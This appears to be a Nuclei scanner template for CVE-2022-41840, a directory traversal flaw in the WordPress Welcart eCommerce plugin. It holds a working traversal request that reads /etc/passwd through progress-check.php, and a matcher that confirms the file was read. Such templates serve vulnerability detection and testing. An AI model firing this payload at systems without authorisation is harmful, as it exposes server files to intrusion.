28 lines
942 B
YAML
28 lines
942 B
YAML
|
id: CVE-2022-41840
|
||
|
|
||
|
info:
|
||
|
name: Welcart eCommerce <= 2.7.7 - Unauth. Directory Traversal
|
||
|
author: theamanrawat
|
||
|
severity: high
|
||
|
description: |
|
||
|
WordPress Welcart eCommerce plugin <= 2.7.7 - Unauth. Directory Traversal vulnerability.
|
||
|
reference:
|
||
|
- https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability
|
||
|
- https://wordpress.org/plugins/usc-e-shop/
|
||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840
|
||
|
classification:
|
||
|
cve-id: CVE-2022-41840
|
||
|
metadata:
|
||
|
verified: "true"
|
||
|
tags: wp-plugin,wp,lfi,unauth,wpscan,cve2022,wordpress,cve,usc-e-shop
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"
|
||
|
|
||
|
matchers:
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0:"
|
||
|
part: body
|